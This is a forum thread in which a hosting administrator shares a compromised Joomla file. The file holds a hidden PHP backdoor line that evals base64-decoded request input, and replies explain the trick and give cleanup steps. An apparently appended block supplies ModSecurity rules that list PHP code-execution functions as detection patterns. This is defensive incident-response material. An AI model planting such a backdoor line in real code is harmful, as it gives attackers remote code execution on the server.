The Community Forums


php Malware problem

Discussion in 'Security' started by afradata, Feb 14, 2013.

  1. afradata

    afradata Registered

    Joined:
    Feb 14, 2013
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Root Administrator
    Hi to all,

    Sorry, my English is not good.

    I have cPanel shared hosting. My server is in the xlhost DC.

    I've received a few BroBot malware complaints from Bank of America.

    xlhost found the user and the file that have been abused and sent me the user information.

    The malware file is PHP code; when I see the URL in a browser it opens the Joomla administrator login page.

    The PHP code file, please see it:

    PHP:
    <?php
    function_exists('date_default_timezone') ? date_default_timezone_set('America/Los_Angeles') : @eval(base64_decode($_REQUEST['c_id']));
    /**
    * @version        $Id: index3.php 14401 2010-01-26 14:10:00Z louis $
    * @package        Joomla
    * @copyright    Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
    * @license        GNU/GPL, see LICENSE.php
    * Joomla! is free software. This version may have been modified pursuant
    * to the GNU General Public License, and as distributed it includes or
    * is derivative of works licensed under the GNU General Public License or
    * other free or open source software licenses.
    * See COPYRIGHT.php for copyright notices and details.
    */

    $_REQUEST['tmpl'] = 'component';
    include('index.php');
    ?>
    Please help me to find this file on my server and remove it or block it.

    Thanks All
     
  2. srpurdy

    srpurdy Well-Known Member

    Joined:
    Jun 1, 2011
    Messages:
    101
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Root Administrator
    Nothing looks unusual in that file. It's more likely either a MySQL injection, or the index.php file (or .htaccess), so I would start by looking at the index.php file and the .htaccess file.

    Although that eval() function looks odd... But it's only requesting information. So there has to be a connection to the index.php file.
     
    #2 srpurdy, Feb 14, 2013
    Last edited: Feb 14, 2013
  3. brianoz

    brianoz Well-Known Member

    Joined:
    Mar 13, 2004
    Messages:
    1,146
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    Melbourne, Australia
    cPanel Access Level:
    Root Administrator
    This is one of the newer tricks - they don't leave the code on the server, they just POST to the PHP file with, in this case, the code in the variable $_REQUEST['cid']. As you say, the code looks surprisingly benign, but it's not. It's like a permanent backdoor into the server!

    One of the clever tricks is that this function name 'date_default_timezone' sounds like one of the PHP functions on the server. However, it's a function that never exists, so the base64_decode (carefully hidden off to the right of the line) is always run.

    You can almost certainly safely remove that first line in its entirety and you should then be secure.
     
  4. cPanelJamyn

    cPanelJamyn Social Engineer
    Staff Member

    Joined:
    Jan 29, 2009
    Messages:
    105
    Likes Received:
    2
    Trophy Points:
    0
    Well, to clarify - if you remove the function_exists('date_default_timezone') ? line, the backdoor will be removed. It's still important to:

    1. determine how they got in. Presumably you are running an old, exploitable version of Joomla (or an old plugin for the platform). It's critical that you keep it up to date, as it's a popular target with a lot of vulnerabilities.

    2. clean up. Search all the files for that (or similar) lines. If they were smart, they'd install at least 3-4 backdoors in the hopes you'll miss one.

    3. ensure all software is up to date. If you have WordPress or Drupal or other PHP apps on the account(s), update those too.

    4. reset your passwords. They got in once already, so make sure you have new passwords.

    Ideally, you'd do a complete recreation of the account after a compromise (install new software, restore the DB data, etc), but I understand that's sometimes not possible.
     
  5. bibiloi

    bibiloi Registered

    Joined:
    Mar 8, 2013
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Root Administrator
    Modifying the PHP file to print what that c_id variable contains, with something like this:

    After a POST:

    this is what the /tmp/hacker.tmp file contains:

    - snipped -
     
    #5 bibiloi, Mar 8, 2013
    Last edited by a moderator: Mar 8, 2013
  6. afradata

    afradata Registered

    Joined:
    Feb 14, 2013
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Root Administrator
    Please help me.

    Can I block this code @eval(base64_decode($_REQUEST['c_id'])); with mod_security?

    I receive warnings from xlhost.
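On the mod_security question above: the rules below are an added example in ModSecurity 2.x SecRule syntax, not from the thread, from cPanel or from any vendor ruleset. They assume rule ids 1000101 to 1000103 are free in your configuration and that SecRequestBodyAccess is On (phase 2 rules only see POST parameters when the body is read). Rule 1 base64-decodes every request argument and blocks it if PHP function calls come out, which is what the c_id payload looks like; rule 2 catches the same payload sent unencoded; rule 3 simply refuses any request that carries a c_id parameter at all, since nothing legitimate in the posted file uses one.

```apache
# Added example in ModSecurity 2.x SecRule syntax; not from the thread, cPanel or any vendor ruleset.
# Rule ids 1000101-1000103 are assumed free; phase:2 needs "SecRequestBodyAccess On" so POST bodies are inspected.

# 1. base64-decode every request argument and refuse it if PHP code comes out.
#    This is the shape of the c_id payload of "@eval(base64_decode($_REQUEST['c_id']))" after decoding.
SecRule ARGS "@rx (?i)\b(?:eval|assert|system|passthru|shell_exec|exec|popen|proc_open|base64_decode|gzinflate|preg_replace|file_put_contents|fwrite)\s*\(" \
    "id:1000101,phase:2,t:none,t:base64Decode,deny,status:403,log,msg:'base64-encoded PHP code in request argument'"

# 2. the same payload sent unencoded (the attacker only has to change the wrapper in the file).
#    Anchored on a superglobal or decoder after the call to keep false positives down.
SecRule ARGS "@rx (?i)\b(?:eval|assert|system|passthru|shell_exec|proc_open)\s*\(\s*(?:\$_|base64_decode|gzinflate|stripslashes)" \
    "id:1000102,phase:2,t:none,t:urlDecodeUni,deny,status:403,log,msg:'PHP code in request argument'"

# 3. nothing legitimate on this site sends a c_id parameter: drop any request that carries one.
SecRule &ARGS:c_id "@gt 0" \
    "id:1000103,phase:2,t:none,deny,status:403,log,msg:'c_id backdoor parameter present'"
```

These rules block the symptom, not the cause: the backdoor file is still there, and an attacker who can edit it can rename the parameter or switch from base64 to an encoding rule 1 does not decode (str_rot13, gzinflate). Use them as a stopgap while removing the file and working through the cleanup steps earlier in the thread, and watch the audit log for hits on 1000101 and 1000103, which show which hosts are still poking at the backdoor.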
     